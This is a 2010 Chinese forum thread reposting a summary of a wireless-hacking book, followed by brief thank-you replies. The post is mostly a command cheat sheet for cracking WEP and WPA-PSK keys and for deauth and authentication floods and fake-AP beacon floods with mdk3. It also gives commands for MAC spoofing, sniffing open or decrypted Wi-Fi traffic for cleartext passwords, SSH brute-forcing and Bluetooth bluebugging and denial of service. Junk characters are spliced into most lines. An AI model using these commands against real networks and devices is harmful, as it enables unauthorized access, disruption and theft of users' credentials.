搜索
格西欧解决方案
如意云路由器
查看: 8718|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3712

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。# \# D  Q8 g$ w8 Q- j2 K

0 t+ i+ q7 v' Y% q4 j2 F以下所有操作均在BackTrack 4中进行。( [: t2 }- T" ]! H; V* _: P3 t  D

( g% G- C2 E' u
" ]/ e; ], }/ h( ^3 V/ E无线WEP加密P解:
) J* V" o4 R: Q9 Z) s; |
2 l! Y9 W# |) b2 U注入P解:
3 b, C- z5 [4 [) Y, k6 A' g4 E, C: h3 o+ F/ m, c
ifconfig
8 L* s2 [  P  n- |* ~  s9 m/ }
$ b  O  t) g; u  m* rifconfig –a2 ~3 i0 f7 u) f* t

- h, }2 w' u+ Q$ w+ O9 Vifconfig wlan0(无线网卡) up
9 Z( _8 @4 N0 j& H/ h- }( s' E" n" [; e( c* s1 s
airmon-ng start wlan0( Y* U( R& v7 k' E! t
! Q% ~' }; l( B1 }& E, U
airodump-ng mon0
( P  d( K. `; ^( _; p$ q- c9 j+ g8 g5 Q% e8 C
airodump-ng --ivs –w ivsfile –c 频道 mon0或
( _) W9 n! D' l" |6 |6 i" z' Y6 a0 q5 M7 i1 I
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
; d* m& c  ^$ Z" |5 E  w
8 g$ Y% ^: O( h) U3 A% B6 @6 Caireplay-ng -3 –b BSSID –h Station mon0
: u7 }7 n' q' B0 {1 l$ {
  V. E* Z& g8 t8 saircrack-ng ivsfile-01.ivs
8 `% f" X+ B& J/ n7 E# z, t' }9 O: x& _: g+ M2 `, F1 N" T
虚连接P解(适用于无客户端连接APP解)
% \3 ^1 d3 j1 Z$ i% y: t
: h& n& i* z0 r( u- gifconfig0 E: V) Y6 d' U* d0 S" z
8 W! Z' K" u1 M
ifconfig –a1 |" d- C) f& @. X3 P$ S) X

% U! w' ?8 @+ g" @+ h! S2 }ifconfig wlan0(无线网卡) up
, Z5 {6 Q) x2 h$ j1 I- V( T2 ]0 V9 N; G
airmon-ng start wlan01 e% H* c8 y# G5 J& p8 U

7 q& O- J2 ]* B6 Vairodump-ng mon0' D! i+ H( v; N1 Z- }' L1 D# u

4 u$ M3 B; ^! o0 ^airodump-ng --ivs –w ivsfile –c 频道 mon0或7 e; |: @' V/ m( E0 ~9 `: y

* ~: ^( e4 J) d# yairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
+ l2 O( W/ q/ ?6 v* Y" S, u0 a* F  v7 x9 m$ l( I
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
. w# O' n/ L5 q9 j$ Q1 e$ o0 r" B6 f( X8 @% U
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0# M/ U! T# a; P. a' u
, p2 s/ d( ~; C) S. \
aircrack-ng ivsfile-01.ivs  Y7 D, _" e* W  d6 s
0 {. X5 W6 k' g4 _) u$ V- i2 i
5 k2 x1 x, k. U8 e: ~0 M* U* a  _! A
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
5 I$ I8 q1 X2 j2 @/ f0 p0 V
/ ~6 H5 E6 r: ?' D: ~) `, `- p) K' t* S- E
WPA-PSKP解
7 w3 w* u+ ~6 v1 c/ `
* H" @6 L% b/ }ifconfig
& ]$ Z8 W, Z; C5 @* v5 m) u6 j, ?
4 Q% x1 r5 c9 v8 Zifconfig –a
, T+ P+ M8 p  R
. Q0 ~3 |1 q; s0 \ifconfig wlan0(无线网卡) up
& E, b! K! b8 J  a5 C
/ _3 L4 v8 g$ g7 r1 p! z6 K6 Zairmon-ng start wlan0
. v- K! D. f& I1 q
9 [; [3 |4 i) e/ s( ]airodump-ng mon0
5 Z! a; k* z+ o/ j! J. `2 s$ [' w: m0 T( I
airodump-ng –w capfile –c 频道 mon0
0 s  P1 d  p; s0 q
! N# z4 {, z' K3 Paireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包. g& W6 `. a) Q9 v1 h

5 _* f; C" Y: w2 g+ }2 h+ Daircrack-ng –w Dic capfile-01.cap或- @! U7 t: ?/ e8 ~

( Y1 r0 K/ U  A7 Z9 ~+ tcowpatty –f Dic –r capfile-01.cap –s SSID( g+ v! }$ U7 t$ j7 ]! x
, w6 ]0 D" u, B& O" i
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID) b7 s: T: c) `: E( C
0 R& [: H5 o7 ]3 g4 c' h
傻瓜式P解软件SpoonWPA。9 _: a, p! C) e
" M$ t5 W' \: ^/ E# |' V+ }- D
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
( Q5 a- l2 l& H, D* m2 L/ R: P+ i
  D- |3 X1 |% `6 ?
; \6 i: V+ \8 H0 c; n: ^字典文件的生成和上传
0 w9 y2 y' ~- X( j5 @* z9 ?5 U9 C) s$ v" |
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。& g2 u: f* `! f' n

2 U/ F# d" }* M9 h" v: w* E
! {5 n2 y# e7 V5 KBT4下开启Tftp:Services—TFTPD—start TFTPD
5 T3 j" s$ s- m. G( l
0 P5 L3 G$ p6 w0 E6 n在Windows的CMD中运行 tftp –i IP put **.dic
+ @3 N1 o: m$ O. j( m' N. h* _4 B) i1 {3 b% S& o& J

( X1 x( Y9 Z" L* NBT4下开启SSH:Services—SSH—start SSH9 l4 u! L* A8 M) z' K" o

5 ]9 R: P6 ]5 M4 F5 F; vWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
$ `% k2 ], s6 V6 B6 `- N& i2 ?4 F6 s& g3 K$ b2 s% _

7 D% o9 c8 o5 M; X' \: e4 E, yAP限制MAC时的解决$ c4 A3 Q1 W7 @' j! J

; x9 s8 F9 H7 x7 ]( B  f当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:; D# o- j3 ^/ m& N2 M

0 u, g' M. u. X4 yifconfig wlan0 hw ether NewMAC
- q" h4 C4 i2 `. w7 h
& F2 R2 z% r! m5 r7 @- o( T/ Q7 A  G
关闭SSID广播的AP探测:6 r* T# N) w' c# D
3 ^2 a5 X' m( R% a* ?- K
1.     Deauth攻击:+ k6 H# [. ^! N1 a* `! B# S* [
* u% a$ Z: _0 t2 Z- w
airodump-ng mon0
% e; \* [* j4 z# m, N) v* p% m' O7 |: v* ^5 Q$ G
aireplay-ng -0 10 –a BSSID –h Station mon0. {0 n; S, r, }/ P" b9 W2 B

4 K/ k" }; k" b6 }( ?* G9 O/ \$ S, B2.     抓包分析, f( c/ g# K/ S( t, b. |0 |
. _4 d% _# Y7 i* H9 u# u3 k: q
Omnipeek
6 g" }0 _2 n! v. U$ l  |1 h9 w, P8 i9 S5 w
Tcpdump –n –e –vvv –i 网卡名& b2 S' I, a* ?
& h$ S, e+ H, _7 x+ _
3.     暴力P解* E4 h3 P" W6 Y5 O' A8 A2 V" O" g+ c

+ k. `9 {& X- o' p3 ^7 KCharon 1.1暴力P解4 _* A- K6 T7 B2 [
( u9 N; s% }4 m) u

6 q7 m* ~7 T& A6 V' V7 Z6 ]% r无线加密数据包的解密) W. A0 @6 X8 d- m. W

+ D# p4 r# U+ \) }; z, ?3 J" E  Y3 K* s: Q. k  ~
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
. |/ S0 S6 t' a. W
$ M2 d+ r0 ?) U7 yFilterNS     DNS解析数据包, R8 A' t) e' L' N+ f

; e1 T6 V, G: u- F1 H& z9 S" EFilter:HTTP    WEB访问数据包
: O6 e7 ?. E, A$ {0 P  Q# b7 w! @- P* X1 e& u' U- d
Filter:msnms   MSN2 l0 A3 g" r2 ]5 g: ^

4 E/ R. }  |4 W" R' cCtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
% Y$ R8 N6 D/ ^6 ^3 w) @7 U  ^3 ~; i% H! D
使用airdecap-ng解密:
! J5 z, t; b1 i; e1 A6 K# `) ?6 V9 D6 N
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap' a' ^) t0 O9 v' O" M" r: Z

# [% d& Q2 g8 ]
9 o* ]9 N3 |) ]( E6 C咖啡馆中无线数据截取(开放式无加密AP), v% G4 x& F/ E! q

3 i/ Z  E2 {; a; b; b- ]1.Airodump-ng –w data –c频道 mon0, p5 z# a! C7 ?

" {# [7 M, U4 Z7 I/ G$ x4 a# Y% K2.使用WireShark打开分析
, m% s( |. I6 D/ X& k4 `1 P$ A( Z2 y( W$ y% A( f
5 k/ u, v# Q' O+ b9 R9 h8 a
BT4下的渗透工具:/ O; W5 ~" R$ x

  X" ^$ }; [' m" `, p6 f" k/ qnmap –sP IP/24        判断C段下存活的主机
2 O( u2 l$ |  o4 `: P( ~9 `  R6 m7 N4 D' L5 _2 K7 `. Z
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
/ t0 m4 K1 F' g! r/ w4 V
5 `0 G0 w6 e, }$ X% S; K+ qnmap –vv –sV IP –p port   指定端口的详细信息。。。
* |# `. k: M) V% n0 h
& Y8 E% I% ^6 T$ y  Q2 d* `namp –O IP/24    判断主机的系统版本
0 A2 \4 d# x' T9 ~! n
( P% R0 p; J9 N- U5 {; y5 g7 m; m) s: J0 T9 V6 _* S1 Y4 }9 d
GUI 版nmap:Zenmap   _8 F; Z: h/ Q' b

0 ^+ ^% l7 ^% B  k/ i% a4 w" Z! D4 ?$ a, c2 q" M  b* w* `
Amap使用:amap –B IP port
+ n. L7 ^: f7 J' L5 f- B3 P" Z( s' c, h2 R
Nbtscan(扫描Windows网络NetBios信息):, }6 m3 u  E- M) t9 H
/ V1 |: F, g1 |5 i; Q. ~* S- U$ P) N
nbtscan –v –s : IP/24
( k% z, D  v* m- H1 w0 W; Z- Q1 W! v- j. H  @+ L+ h
nbtscan –r IP
) f6 B& v1 Z2 z" J5 j  I
4 f! \8 e! j3 Y2 v1 Y# e4 ?/ E. S
! z; l: H, g! ?; e6 c8 pDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.% x: R8 Q" I. G4 h: `

+ w( h& }1 P: `" a# D. X* Z# r1 |5 j4 g% h, O2 R+ M+ n: G
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)5 f- e4 Y- @- k3 r3 X
" B; w$ }. J2 W" I: a* y' |# e
BruteSSH: ./bruthe.py –h IP –u Username –d Dic) v4 e7 |& t1 |2 h% q+ A

# b! ]& K  |7 V- BMetasploit3使用
; e% i9 v3 U- e, e: ]5 s8 |无线D.0.S+ N: k6 K$ ?# k2 u5 @

% N4 m) q% T4 I
% J6 b2 Y- L4 N/ @! v: k- GAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
2 a, }% s! i5 r7 e9 O" W1 \
2 m1 }/ |/ e: j' x+ P0 fairmon-ng start wlan0
* S7 D9 S8 Y/ z/ o; x  U* A
0 M1 w$ L. ?4 t9 Aairodump-ng mon0
5 x6 G* q0 p! u0 Z% O, T) F3 C/ V  Q5 V1 \6 V7 r3 I
mdk3 mon0 a –a BSSID* B6 M: ~6 r7 J; s% B( F1 S+ A6 l5 _

8 k0 L  y- Z: {' B/ _对所有的AP攻击:mdk3 mon0 a5 l8 s6 |7 L: \

- N; y! ^0 r2 D  M% N. n# T, G2 n* j6 f" N6 L# H
Deauth Flood 攻击
3 I. w4 W* `/ y! h6 G9 o
0 n- X( o% e8 B, _mdk3 mon0 d –c Channel4 i* ^, l. @- e: y7 m

2 C1 v; G# _# n0 v$ g图形化D.O.S攻击:Charon
! b+ F( G& e% F8 i6 }8 |6 y
$ f9 a6 f1 `/ U: Z. P/ [$ ^7 O- N( |, R4 m3 ?
当受到攻击时,使用Wireshark抓包可以看到异常信息。' a* _: v6 v5 K/ f4 @
$ J5 T* `5 w9 a  \) t

2 v/ a1 \: d* C0 uWPA-PSK高速P解0 ]& {! [3 V0 W

1 d0 M: S- N" ^1.       WPA-PSK PMK Hash TablesP解. V4 Y; r- @# U( q, n# t

3 U. Q6 {! L+ YCowpatty –d HashTable.hash –r ***.cap –s SSID
' T' H! l* ]1 s
+ b) x6 B6 f0 _1 J3 {/ s) lHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
0 L3 H) X; ]2 c1 I  O; h4 f3 t3 r7 L, Z  c
2.       GPU辅助高速P解
, R, k! z5 S! n0 |. \% H' [
! ?# F" o( R1 d% `$ B& e) i使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
; L( b0 f- D" p/ N, f; t8 Y" ^7 Q- T! n8 C' c  o7 Y+ X6 U
3.       分布式P解8 [4 K3 S& W/ a" h3 V7 O. i' D

0 \& V- O6 F7 e3 P& D- J$ q" c
6 J1 P+ t+ Z1 GAP的伪造; g) a% ?& y# O- T7 [- ?1 K
7 v5 A5 N( C6 k0 \& v& O6 R
把AP的MAC改成目标AP的MAC* c4 d& p4 @- T
2 O# t5 ^0 l9 q( [# T& D: Q9 h: h
网卡软AP3 t6 O/ E$ N  j/ D; k+ {4 {
- R4 _$ W; x: j. C6 g

: J5 r7 U: o/ M; I' c伪造大量虚假AP信号:
' `3 u4 l7 T2 _1 p  R! O  Q
  b, @3 c" l+ O* O2 t8 [随机SSID:mdk3 mon0 b –g –c 频道 ) Y2 j: v; S* j( b( G

) ?9 O& T/ u, p* p指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
: }6 f! t/ W& H7 _% J. ^2 y- G2 K% J% i) E" R9 v) h
6 `4 x* r4 D$ }! z6 l" g
War-Driving
6 o" H$ H- S, n# x$ i8 Q" `- j2 X. D2 q; {& |. |% I2 _* o
热点地图绘制' \1 F- e& t3 |- S1 I1 t5 ]; q. B

/ L2 D, |1 x  m7 r1 n! qWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。9 p0 H7 U( L5 |1 U) f  Q- j
9 e$ H  j! u8 `

" U2 ]9 r( N& `, z9 c- R- W1 N; MNetstumble1 m" _+ K( j0 D2 Q7 {+ A# O. _
! x1 c( o: ~" @& S% T! M0 M' L5 w

0 G& D8 y, Q" t# M蓝牙Hacking
4 w/ w  b- ?$ d, ^  I4 I" ^) Y) G1 r, `3 Y' y1 X
Windows下的Blue Soleil工具
2 g8 g  \/ Y/ R  X4 P3 }/ E$ ?
+ Y, b8 q9 e0 x- D+ hBT4:4 n6 S5 E- @3 q$ K
3 ]; e- A2 U: Y, l: y
hciconfig 查看蓝牙适配器
  C! b( j7 }1 C$ F  R& I. j  a2 P# y5 S5 q
hciconfig hci0 up 载入蓝牙适配器+ U# H6 z& w; v) f2 G) x& I& O! }
& v2 H: f4 I2 r) y4 U' A4 \
hciconfig hci0 class 蓝牙适配器详细信息! L& D6 G5 I) M4 [  P, ~, x8 P. p+ b

4 ~- p  d7 F: Z( n& m/ @3 X# }! _
8 @. f( I, x0 R1 p3 E9 _hcitool(扫描蓝牙)& s& l. F& I" J" N# ?# J

$ D+ s5 A2 i# Ehcitool –i hci0 scan
& Z/ A( l+ n; d! `2 K- W3 T
& D8 w! }, W5 V" B. jBTscanner(扫描蓝牙)
- B+ c9 h/ _9 g# n) c2 _; {% f5 h! n/ L$ X; ~3 O$ }- G0 ]0 w
* p, @. X0 ]+ i- y1 ]
蓝牙攻击:4 x. L$ `9 ]2 Q; x) j4 @) |8 O
. m) ?3 J: K# q2 l3 j: V% R
BlueBugging (适用于BlueTooth V1.1的手机)! @- b* u! }  s0 s/ Q

/ k) O. V1 s4 N9 y* f) q8 ABluebugger工具:) p! @% _& U8 a, W

) q% d5 s) s, x' ^4 XBulebugger –a HD_Addr info$ v; R; ~: @% Q7 I

, T' Z8 L. D" U! }3 r% B( i
& N: e; d/ a  n. q' O: J5 z+ oBlueJacking( a; t: [! U; b5 [
4 i# K6 h0 y# Y5 E
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。$ Z/ X# t; z5 H/ H% x# h. J7 a

2 X6 m! q2 A5 I0 g0 L6 O# G
4 L& m$ m+ W( R' U4 THD_Addr修改:  \; {8 l$ s4 _8 L

$ z# E/ w9 O" Q" C$ H( ABdaddr工具2 z4 g+ }2 P" E! J" p
6 s8 c$ P+ r6 d
bdaddr –i 蓝牙设备名 新HD_addr
5 p9 ?. u: i  N) O8 g9 ]  n- |/ g& ]3 V) W8 j$ C& B3 x  {* S

, c' Y$ t, F- h. h6 z6 }蓝牙D.O.S
  Z: ]3 V. W" P( n; v) W+ Z6 y5 {- p2 E* J
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
1 a- u6 B& n" C; A' D1 D6 ^- u; @
hciconfig
4 r' i# e/ o# y9 A% R4 L# v
: w7 t3 K' P: J+ q) jhciconfig hci0 up( V, e$ V8 ^) v' w$ ^
( Z+ {" i8 ~5 R& X+ t/ t
hcitool –i hci0 scan
# O# e' h1 X  l! t: A) U7 q" Z, Q
6 F; ^, V1 B/ P' c: zl2ping –s 10000 –目标MAC! M2 u5 k- b; Y( i$ @7 s/ L

- q+ _: x6 v; P
( i9 |2 J  v  K6 v6 I不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
, S0 t% n/ Z7 C% Y* ?0 T* x$ d
- ~/ {, e2 n7 k& t6 L1 X, l0 m./fang –r ************-############ -s! O1 k4 C1 g* T0 T8 x1 q
* M& D1 I7 H/ L, }! Y- \; I1 x
暴力P解************-############的蓝牙设备$ n9 e* ]# t: t. b9 w

, D5 E6 C% H) V4 e2 [" c) h$ u" C./fang –l 各厂商BD_Addr分配
6 A  C9 h% M+ ~% T) M1 s+ Y
! S# {* @! A2 l0 u7 I( f- o2 p4 e7 g: `' E& V
WifiZoo使用! U( W5 i3 q4 x- _5 V! J, f
. p$ x! J, Y7 r: y
./wifizoo.py –c Capfile
2 @: Y" \( i; O1 Q% \( O( ]6 r& X  a3 B
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1128

积分

上尉

该用户从未签到

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

252

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

680

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。: p& r7 ?4 [+ B8 ~
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的/ m7 z) W0 t% Q: N' Z, G% F0 D
呵呵 其实也不贵 21块 快递再一点- C# r& p/ s  Y
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )      小黑屋 | 免责声明

GMT+8, 2014-9-17 09:29 , Processed in 0.143541 second(s), 16 queries , Gzip On ,Memcache On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表